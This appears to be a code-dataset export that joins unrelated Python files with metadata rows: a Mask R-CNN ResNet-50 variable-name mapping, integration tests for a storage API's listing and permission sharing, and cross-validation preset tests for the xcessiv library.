'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/batch_normalization_39/moving_mean': 'resnet50/btlnck_block_2_4/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/batch_normalization_39/moving_variance': 'resnet50/btlnck_block_2_4/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/conv2d_39/kernel': 'resnet50/btlnck_block_2_4/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/batch_normalization_40/beta': 'resnet50/btlnck_block_2_5/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/batch_normalization_40/gamma': 'resnet50/btlnck_block_2_5/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/batch_normalization_40/moving_mean': 'resnet50/btlnck_block_2_5/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/batch_normalization_40/moving_variance': 'resnet50/btlnck_block_2_5/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/conv2d_40/kernel': 'resnet50/btlnck_block_2_5/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/batch_normalization_41/beta': 'resnet50/btlnck_block_2_5/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/batch_normalization_41/gamma': 'resnet50/btlnck_block_2_5/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/batch_normalization_41/moving_mean': 'resnet50/btlnck_block_2_5/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/batch_normalization_41/moving_variance': 'resnet50/btlnck_block_2_5/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/conv2d_41/kernel': 'resnet50/btlnck_block_2_5/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/batch_normalization_42/beta': 'resnet50/btlnck_block_2_5/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/batch_normalization_42/gamma': 'resnet50/btlnck_block_2_5/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/batch_normalization_42/moving_mean': 'resnet50/btlnck_block_2_5/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/batch_normalization_42/moving_variance': 'resnet50/btlnck_block_2_5/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/conv2d_42/kernel': 'resnet50/btlnck_block_2_5/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/batch_normalization_44/beta': 'resnet50/btlnck_block_3_0/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/batch_normalization_44/gamma': 'resnet50/btlnck_block_3_0/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/batch_normalization_44/moving_mean': 'resnet50/btlnck_block_3_0/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/batch_normalization_44/moving_variance': 'resnet50/btlnck_block_3_0/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/conv2d_44/kernel': 'resnet50/btlnck_block_3_0/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/batch_normalization_45/beta': 'resnet50/btlnck_block_3_0/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/batch_normalization_45/gamma': 'resnet50/btlnck_block_3_0/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/batch_normalization_45/moving_mean': 'resnet50/btlnck_block_3_0/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/batch_normalization_45/moving_variance': 'resnet50/btlnck_block_3_0/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/conv2d_45/kernel': 'resnet50/btlnck_block_3_0/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/batch_normalization_46/beta': 'resnet50/btlnck_block_3_0/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/batch_normalization_46/gamma': 'resnet50/btlnck_block_3_0/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/batch_normalization_46/moving_mean': 'resnet50/btlnck_block_3_0/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/batch_normalization_46/moving_variance': 'resnet50/btlnck_block_3_0/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/conv2d_46/kernel': 'resnet50/btlnck_block_3_0/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/batch_normalization_43/beta': 'resnet50/btlnck_block_3_0/shortcut/conv2d/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/batch_normalization_43/gamma': 'resnet50/btlnck_block_3_0/shortcut/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/batch_normalization_43/moving_mean': 'resnet50/btlnck_block_3_0/shortcut/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/batch_normalization_43/moving_variance': 'resnet50/btlnck_block_3_0/shortcut/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/conv2d_43/kernel': 'resnet50/btlnck_block_3_0/shortcut/conv2d/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/batch_normalization_47/beta': 'resnet50/btlnck_block_3_1/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/batch_normalization_47/gamma': 'resnet50/btlnck_block_3_1/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/batch_normalization_47/moving_mean': 'resnet50/btlnck_block_3_1/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/batch_normalization_47/moving_variance': 'resnet50/btlnck_block_3_1/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/conv2d_47/kernel': 'resnet50/btlnck_block_3_1/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/batch_normalization_48/beta': 'resnet50/btlnck_block_3_1/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/batch_normalization_48/gamma': 'resnet50/btlnck_block_3_1/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/batch_normalization_48/moving_mean': 'resnet50/btlnck_block_3_1/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/batch_normalization_48/moving_variance': 'resnet50/btlnck_block_3_1/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/conv2d_48/kernel': 'resnet50/btlnck_block_3_1/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/batch_normalization_49/beta': 'resnet50/btlnck_block_3_1/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/batch_normalization_49/gamma': 'resnet50/btlnck_block_3_1/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/batch_normalization_49/moving_mean': 'resnet50/btlnck_block_3_1/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/batch_normalization_49/moving_variance': 'resnet50/btlnck_block_3_1/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/conv2d_49/kernel': 'resnet50/btlnck_block_3_1/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/batch_normalization_50/beta': 'resnet50/btlnck_block_3_2/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/batch_normalization_50/gamma': 'resnet50/btlnck_block_3_2/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/batch_normalization_50/moving_mean': 'resnet50/btlnck_block_3_2/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/batch_normalization_50/moving_variance': 'resnet50/btlnck_block_3_2/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/conv2d_50/kernel': 'resnet50/btlnck_block_3_2/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/batch_normalization_51/beta': 'resnet50/btlnck_block_3_2/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/batch_normalization_51/gamma': 'resnet50/btlnck_block_3_2/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/batch_normalization_51/moving_mean': 'resnet50/btlnck_block_3_2/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/batch_normalization_51/moving_variance': 'resnet50/btlnck_block_3_2/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/conv2d_51/kernel': 'resnet50/btlnck_block_3_2/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/batch_normalization_52/beta': 'resnet50/btlnck_block_3_2/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/batch_normalization_52/gamma': 'resnet50/btlnck_block_3_2/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/batch_normalization_52/moving_mean': 'resnet50/btlnck_block_3_2/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/batch_normalization_52/moving_variance': 'resnet50/btlnck_block_3_2/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/conv2d_52/kernel': 'resnet50/btlnck_block_3_2/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/conv2d_block/batch_normalization/beta': 'resnet50/conv2d/BatchNorm/beta',
'mrcnn/resnet50/conv2d_block/batch_normalization/gamma': 'resnet50/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/conv2d_block/batch_normalization/moving_mean': 'resnet50/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/conv2d_block/batch_normalization/moving_variance': 'resnet50/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/conv2d_block/conv2d/kernel': 'resnet50/conv2d/conv2d/kernel',
}
| 161.051661 | 183 | 0.865414 | 6,365 | 43,645 | 5.437706 | 0.013669 | 0.099535 | 0.172777 | 0.210338 | 0.982058 | 0.980931 | 0.97521 | 0.918725 | 0.84164 | 0.770506 | 0 | 0.086958 | 0.036957 | 43,645 | 270 | 184 | 161.648148 | 0.736486 | 0.002749 | 0 | 0 | 0 | 0 | 0.926352 | 0.926352 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
9e3f549696b97ad5418eb0bb33fa8e5100aa7fb1 | 16,197 | py | Python | tests/integration/test_api_sharing_resources.py | neuro-inc/platform-storage-api | 7564d6f353f7839962cc5dc2793ba44359eaf390 | [
"Apache-2.0"
] | null | null | null | tests/integration/test_api_sharing_resources.py | neuro-inc/platform-storage-api | 7564d6f353f7839962cc5dc2793ba44359eaf390 | [
"Apache-2.0"
] | 2 | 2021-12-29T21:43:29.000Z | 2022-01-27T10:45:49.000Z | tests/integration/test_api_sharing_resources.py | neuro-inc/platform-storage-api | 7564d6f353f7839962cc5dc2793ba44359eaf390 | [
"Apache-2.0"
] | null | null | null | import asyncio
from collections.abc import Awaitable, Callable
from io import BytesIO
from time import time as current_time
from typing import Any
from unittest import mock
import aiohttp
import yarl
from platform_storage_api.fs.local import FileStatusType
from .auth import _User, _UserFactory
from tests.integration.conftest import ApiConfig, status_iter_response_to_list
class TestStorageListAndResourceSharing:
def file_status_sort(self, file_status: dict[str, Any]) -> Any:
return file_status["path"]
async def test_ls_other_user_data_no_permission(
self,
server_url: str,
api: ApiConfig,
client: aiohttp.ClientSession,
regular_user_factory: _UserFactory,
) -> None:
user1 = await regular_user_factory()
headers = {"Authorization": "Bearer " + user1.token}
dir_url = f"{server_url}/{user1.name}/path/to"
url = dir_url + "/file"
payload = b"test"
async with client.put(url, headers=headers, data=BytesIO(payload)) as response:
assert response.status == 201
user2 = await regular_user_factory()
headers = {
"Authorization": "Bearer " + user2.token,
"Accept": "application/x-ndjson",
}
params = {"op": "LISTSTATUS"}
async with client.get(dir_url, headers=headers, params=params) as response:
assert response.status == 404
async def test_ls_other_user_data_no_permission_issue(
self,
server_url: str,
api: ApiConfig,
client: aiohttp.ClientSession,
regular_user_factory: _UserFactory,
) -> None:
# user1 uploads a file
user1 = await regular_user_factory()
headers = {"Authorization": "Bearer " + user1.token}
dir_url = f"{server_url}/{user1.name}/path/to"
url = dir_url + "/file"
payload = b"test"
async with client.put(url, headers=headers, data=BytesIO(payload)) as response:
assert response.status == 201
# user2 uploads a file
user2 = await regular_user_factory()
headers = {"Authorization": "Bearer " + user2.token}
dir_url = f"{server_url}/{user2.name}/path/to"
url = dir_url + "/file"
payload = b"test"
async with client.put(url, headers=headers, data=BytesIO(payload)) as response:
assert response.status == 201
# user2 lists users
headers = {
"Authorization": "Bearer " + user2.token,
"Accept": "application/x-ndjson",
}
dir_url = f"{server_url}/{user2.name}/../"
params = {"op": "LISTSTATUS"}
async with client.get(
yarl.URL(dir_url, encoded=True), headers=headers, params=params
) as response:
assert response.status == 200
assert response.headers["Content-Type"] == "application/x-ndjson"
resp_text = await response.text()
assert user1.name not in resp_text
assert user2.name in resp_text
async def test_ls_other_user_data_shared_with_files(
self,
server_url: str,
api: ApiConfig,
client: aiohttp.ClientSession,
regular_user_factory: _UserFactory,
granter: Callable[[str, Any, _User], Awaitable[None]],
cluster_name: str,
) -> None:
user1 = await regular_user_factory()
headers1 = {"Authorization": "Bearer " + user1.token}
user2 = await regular_user_factory()
headers2 = {
"Authorization": "Bearer " + user2.token,
"Accept": "application/x-ndjson",
}
# create file /path/to/file by user1
dir_url = f"{server_url}/{user1.name}/path/to"
url = dir_url + "/file"
payload = b"test"
min_mtime_first = int(current_time())
async with client.put(url, headers=headers1, data=BytesIO(payload)) as response:
assert response.status == 201
params = {"op": "MKDIRS"}
async with client.put(
dir_url + "/second", headers=headers1, params=params
) as response:
assert response.status == 201
# list by user2
params = {"op": "LISTSTATUS"}
async with client.get(dir_url, headers=headers2, params=params) as response:
assert response.status == 404
await granter(
user2.name,
[{"uri": f"storage://{cluster_name}/{user1.name}/path/", "action": "read"}],
user1,
)
async with client.get(dir_url, headers=headers2, params=params) as response:
assert response.status == 200
assert response.headers["Content-Type"] == "application/x-ndjson"
statuses = await status_iter_response_to_list(response.content)
statuses = sorted(statuses, key=self.file_status_sort)
assert statuses == [
{
"path": "file",
"length": len(payload),
"type": str(FileStatusType.FILE),
"modificationTime": mock.ANY,
"permission": "read",
},
{
"path": "second",
"length": 0,
"type": str(FileStatusType.DIRECTORY),
"modificationTime": mock.ANY,
"permission": "read",
},
]
for status in statuses:
assert status["modificationTime"] >= min_mtime_first
async def test_ls_other_user_data_exclude_files(
self,
server_url: str,
api: ApiConfig,
client: aiohttp.ClientSession,
regular_user_factory: _UserFactory,
granter: Callable[[str, Any, _User], Awaitable[None]],
cluster_name: str,
) -> None:
user1 = await regular_user_factory()
headers1 = {"Authorization": "Bearer " + user1.token}
user2 = await regular_user_factory()
headers2 = {
"Authorization": "Bearer " + user2.token,
"Accept": "application/x-ndjson",
}
# create file /path/to/file by user1
dir_url = f"{server_url}/{user1.name}/path/to/"
url = dir_url + "/file"
payload = b"test"
min_mtime_first = int(current_time())
async with client.put(url, headers=headers1, data=BytesIO(payload)) as response:
assert response.status == 201
params = {"op": "MKDIRS"}
async with client.put(
dir_url + "/first/second", headers=headers1, params=params
) as response:
assert response.status == 201
# list by user2
params = {"op": "LISTSTATUS"}
async with client.get(dir_url, headers=headers2, params=params) as response:
assert response.status == 404
root_uri = f"storage://{cluster_name}/{user1.name}"
await granter(
user2.name, [{"uri": root_uri + "/path/to/first", "action": "read"}], user1
)
async with client.get(dir_url, headers=headers2, params=params) as response:
assert response.status == 200
assert response.headers["Content-Type"] == "application/x-ndjson"
statuses = await status_iter_response_to_list(response.content)
statuses = sorted(statuses, key=self.file_status_sort)
assert statuses == [
{
"path": "first",
"length": 0,
"type": str(FileStatusType.DIRECTORY),
"modificationTime": mock.ANY,
"permission": "read",
}
]
for status in statuses:
assert status["modificationTime"] >= min_mtime_first
async def test_liststatus_other_user_data_two_subdirs(
self,
server_url: str,
api: ApiConfig,
client: aiohttp.ClientSession,
regular_user_factory: _UserFactory,
granter: Callable[[str, Any, _User], Awaitable[None]],
cluster_name: str,
) -> None:
user1 = await regular_user_factory()
headers1 = {"Authorization": "Bearer " + user1.token}
user2 = await regular_user_factory()
headers2 = {
"Authorization": "Bearer " + user2.token,
"Accept": "application/x-ndjson",
}
# create file /path/to/file by user1
dir_url = f"{server_url}/{user1.name}/path/to"
url = dir_url + "/file"
payload = b"test"
async with client.put(url, headers=headers1, data=BytesIO(payload)) as response:
assert response.status == 201
params = {"op": "MKDIRS"}
min_mtime_second = int(current_time())
async with client.put(
dir_url + "/first/second", headers=headers1, params=params
) as response:
assert response.status == 201
min_mtime_third = int(current_time())
async with client.put(
dir_url + "/first/third", headers=headers1, params=params
) as response:
assert response.status == 201
async with client.put(
dir_url + "/first/fourth", headers=headers1, params=params
) as response:
assert response.status == 201
# list by user2
params = {"op": "LISTSTATUS"}
async with client.get(dir_url, headers=headers2, params=params) as response:
assert response.status == 404
root_uri = f"storage://{cluster_name}/{user1.name}"
await granter(
user2.name,
[{"uri": root_uri + "/path/to/first/second", "action": "read"}],
user1,
)
await granter(
user2.name,
[{"uri": root_uri + "/path/to/first/third", "action": "read"}],
user1,
)
async with client.get(
dir_url + "/first", headers=headers2, params=params
) as response:
assert response.status == 200
assert response.headers["Content-Type"] == "application/x-ndjson"
statuses = await status_iter_response_to_list(response.content)
statuses = sorted(statuses, key=self.file_status_sort)
assert statuses == [
{
"path": "second",
"length": 0,
"type": str(FileStatusType.DIRECTORY),
"modificationTime": mock.ANY,
"permission": "read",
},
{
"path": "third",
"length": 0,
"type": str(FileStatusType.DIRECTORY),
"modificationTime": mock.ANY,
"permission": "read",
},
]
assert statuses[0]["modificationTime"] >= min_mtime_second
assert statuses[1]["modificationTime"] >= min_mtime_third
async def test_liststatus_permissions(
self,
server_url: str,
api: ApiConfig,
client: aiohttp.ClientSession,
regular_user_factory: _UserFactory,
granter: Callable[[str, Any, _User], Awaitable[None]],
cluster_name: str,
) -> None:
user1 = await regular_user_factory()
headers1 = {"Authorization": "Bearer " + user1.token}
user2 = await regular_user_factory()
headers2 = {
"Authorization": "Bearer " + user2.token,
"Accept": "application/x-ndjson",
}
# create file /path/to/file by user1
dir_url = f"{server_url}/{user1.name}/path/to"
url = dir_url + "/file"
payload = b"test"
async with client.put(url, headers=headers1, data=BytesIO(payload)) as response:
assert response.status == 201
params = {"op": "MKDIRS"}
await asyncio.sleep(1)
min_mtime_third = int(current_time())
await asyncio.sleep(1)
async with client.put(
dir_url + "/first/second/third", headers=headers1, params=params
) as response:
assert response.status == 201
await asyncio.sleep(1)
min_mtime_fourth = int(current_time())
await asyncio.sleep(1)
async with client.put(
dir_url + "/first/second/fourth", headers=headers1, params=params
) as response:
assert response.status == 201
await asyncio.sleep(1)
async with client.put(
dir_url + "/first/fifth", headers=headers1, params=params
) as response:
assert response.status == 201
# list by user2
params = {"op": "LISTSTATUS"}
async with client.get(dir_url, headers=headers2, params=params) as response:
assert response.status == 404
root_uri = f"storage://{cluster_name}/{user1.name}"
await granter(
user2.name, [{"uri": root_uri + "/path/to/file", "action": "read"}], user1
)
await granter(
user2.name,
[{"uri": root_uri + "/path/to/first/second", "action": "write"}],
user1,
)
await granter(
user2.name,
[{"uri": root_uri + "/path/to/first/second/third", "action": "manage"}],
user1,
)
async with client.get(dir_url, headers=headers2, params=params) as response:
assert response.status == 200
assert response.headers["Content-Type"] == "application/x-ndjson"
statuses = await status_iter_response_to_list(response.content)
statuses = sorted(statuses, key=self.file_status_sort)
assert statuses == [
{
"path": "file",
"length": 4,
"type": "FILE",
"modificationTime": mock.ANY,
"permission": "read",
},
{
"path": "first",
"length": 0,
"type": "DIRECTORY",
"modificationTime": mock.ANY,
"permission": "read",
},
]
assert statuses[0]["modificationTime"] <= min_mtime_third
assert statuses[1]["modificationTime"] >= min_mtime_fourth
async with client.get(
dir_url + "/first", headers=headers2, params=params
) as response:
assert response.status == 200
assert response.headers["Content-Type"] == "application/x-ndjson"
statuses = await status_iter_response_to_list(response.content)
statuses = sorted(statuses, key=self.file_status_sort)
assert statuses == [
{
"path": "second",
"length": 0,
"type": "DIRECTORY",
"modificationTime": mock.ANY,
"permission": "write",
}
]
assert statuses[0]["modificationTime"] >= min_mtime_fourth
async with client.get(
dir_url + "/first/second", headers=headers2, params=params
) as response:
assert response.status == 200
assert response.headers["Content-Type"] == "application/x-ndjson"
statuses = await status_iter_response_to_list(response.content)
statuses = sorted(statuses, key=self.file_status_sort)
assert statuses == [
{
"path": "fourth",
"length": 0,
"type": "DIRECTORY",
"modificationTime": mock.ANY,
"permission": "write",
},
{
"path": "third",
"length": 0,
"type": "DIRECTORY",
"modificationTime": mock.ANY,
"permission": "manage",
},
]
assert statuses[0]["modificationTime"] >= min_mtime_fourth
assert statuses[1]["modificationTime"] >= min_mtime_third
assert statuses[1]["modificationTime"] <= min_mtime_fourth
| 37.580046 | 88 | 0.548682 | 1,617 | 16,197 | 5.350031 | 0.085343 | 0.024275 | 0.046815 | 0.074905 | 0.915732 | 0.907063 | 0.90059 | 0.855624 | 0.847879 | 0.807999 | 0 | 0.018384 | 0.338396 | 16,197 | 430 | 89 | 37.667442 | 0.788914 | 0.015744 | 0 | 0.751323 | 0 | 0 | 0.142247 | 0.030383 | 0 | 0 | 0 | 0 | 0.137566 | 1 | 0.002646 | false | 0 | 0.029101 | 0.002646 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ea07d5ca60daf24c5cef43ba8e90617dc8388f9 | 3,328 | py | Python | xcessiv/presets/tests/test_cvsetting.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 1,362 | 2017-05-23T15:02:18.000Z | 2022-03-28T22:42:21.000Z | xcessiv/presets/tests/test_cvsetting.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 40 | 2017-05-23T17:59:05.000Z | 2019-07-03T13:08:14.000Z | xcessiv/presets/tests/test_cvsetting.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 123 | 2017-05-24T05:49:34.000Z | 2022-02-06T17:54:32.000Z | from __future__ import absolute_import, print_function, division, unicode_literals
import unittest
from sklearn.datasets import load_iris
from xcessiv import functions
from xcessiv.presets import cvsetting
class TestKFold(unittest.TestCase):
def setUp(self):
self.X, self.y = load_iris(return_X_y=True)
def test_k_fold_source(self):
module = functions.import_string_code_as_module(cvsetting.k_fold['source'])
assert hasattr(module, 'return_splits_iterable')
list(module.return_splits_iterable(self.X, self.y))
del module
class TestStratifiedKFold(unittest.TestCase):
def setUp(self):
self.X, self.y = load_iris(return_X_y=True)
def test_source(self):
module = functions.import_string_code_as_module(cvsetting.stratified_k_fold['source'])
assert hasattr(module, 'return_splits_iterable')
list(module.return_splits_iterable(self.X, self.y))
del module
class TestShuffleSplit(unittest.TestCase):
def setUp(self):
self.X, self.y = load_iris(return_X_y=True)
def test_source(self):
module = functions.import_string_code_as_module(cvsetting.shuffle_split['source'])
assert hasattr(module, 'return_splits_iterable')
list(module.return_splits_iterable(self.X, self.y))
del module
class TestStratifiedShuffleSplit(unittest.TestCase):
def setUp(self):
self.X, self.y = load_iris(return_X_y=True)
def test_source(self):
module = functions.import_string_code_as_module(cvsetting.stratified_shuffle_split['source'])
assert hasattr(module, 'return_splits_iterable')
list(module.return_splits_iterable(self.X, self.y))
del module
class TestLeaveOneOut(unittest.TestCase):
def setUp(self):
self.X, self.y = load_iris(return_X_y=True)
def test_source(self):
module = functions.import_string_code_as_module(cvsetting.leave_one_out['source'])
assert hasattr(module, 'return_splits_iterable')
list(module.return_splits_iterable(self.X, self.y))
del module
class TestLeavePOut(unittest.TestCase):
def setUp(self):
self.X, self.y = load_iris(return_X_y=True)
def test_source(self):
module = functions.import_string_code_as_module(cvsetting.leave_p_out['source'])
assert hasattr(module, 'return_splits_iterable')
list(module.return_splits_iterable(self.X, self.y))
del module
class TestGroupKFold(unittest.TestCase):
def setUp(self):
self.X, self.y = load_iris(return_X_y=True)
def test_source(self):
module = functions.import_string_code_as_module(cvsetting.group_k_fold['source'])
assert hasattr(module, 'return_splits_iterable')
generator = module.return_splits_iterable(self.X, self.y)
self.assertRaises(
ValueError,
list,
generator
)
del module
class TestTimeSeriesSplit(unittest.TestCase):
def setUp(self):
self.X, self.y = load_iris(return_X_y=True)
def test_source(self):
module = functions.import_string_code_as_module(cvsetting.leave_one_out['source'])
assert hasattr(module, 'return_splits_iterable')
list(module.return_splits_iterable(self.X, self.y))
del module
| 28.93913 | 101 | 0.704026 | 432 | 3,328 | 5.145833 | 0.138889 | 0.035987 | 0.064777 | 0.071975 | 0.82861 | 0.82861 | 0.82861 | 0.82861 | 0.812416 | 0.789924 | 0 | 0 | 0.199519 | 3,328 | 114 | 102 | 29.192982 | 0.834459 | 0 | 0 | 0.648649 | 0 | 0 | 0.067308 | 0.052885 | 0 | 0 | 0 | 0 | 0.121622 | 1 | 0.216216 | false | 0 | 0.175676 | 0 | 0.5 | 0.013514 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ebaa5bb66d65118e375970965523a993d511790 | 4,177 | py | Python | backend/scraper/scraper_tests.py | cs130-w22/Group-A7 | 26172fa9c0b2a18fde0f569ab34e85927d941ba6 | [
"Apache-2.0"
] | null | null | null | backend/scraper/scraper_tests.py | cs130-w22/Group-A7 | 26172fa9c0b2a18fde0f569ab34e85927d941ba6 | [
"Apache-2.0"
